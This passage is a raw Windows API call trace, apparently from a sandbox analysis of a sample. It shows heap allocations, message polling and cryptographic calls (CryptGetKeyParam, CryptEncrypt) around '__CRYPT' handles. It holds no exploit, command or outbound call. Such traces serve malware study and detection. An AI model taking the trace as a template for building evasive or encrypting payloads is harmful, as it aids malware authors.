dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0040.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0040.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0040.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0040.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0040.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0040.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0040.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0040.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0040.102] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0040.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0040.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0040.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0040.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0040.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0040.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0040.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0040.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0040.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0040.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0040.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0040.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0040.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0040.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0040.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0040.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0040.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0040.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0040.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0040.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0040.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0040.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0040.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.103] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0040.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0040.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0040.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0040.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0040.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0040.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0040.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0040.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0040.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0040.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0040.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0040.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0040.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0040.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0040.104] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0040.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0040.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0040.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0040.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0040.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0040.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0040.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0040.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0040.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0040.105] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0040.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb98 [0040.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0040.105] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0040.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0040.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0040.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0040.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0040.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0040.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0040.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0040.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0040.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0040.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0040.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0040.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0040.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0040.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0040.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0040.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0040.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0040.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0040.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0040.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0040.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0040.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0040.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0040.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0040.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0040.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0040.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0040.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0040.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0040.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0040.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0040.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0040.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0040.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0040.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0040.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0040.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0040.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0040.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0040.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0040.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0040.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0040.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0040.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0040.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0040.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0040.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0040.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0040.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0040.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0040.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0040.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0040.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0040.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0040.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0040.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0040.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0040.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0040.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0040.108] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0040.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0040.108] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da368, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da368*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0040.108] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.108] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.108] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.108] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.108] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.108] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.108] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.108] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.108] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0040.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0040.109] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.109] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0040.109] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0040.109] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.109] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.109] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0040.109] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.109] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0040.109] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.109] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.109] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.109] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0040.109] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.109] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0040.109] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.110] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.110] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xdda0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xddb0) returned 1 [0040.110] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.110] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0040.110] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.110] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.110] CharLowerBuffW (in: lpsz="byte[56753]", cchLength=0xb | out: lpsz="byte[56753]") returned 0xb [0040.110] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.112] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.112] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 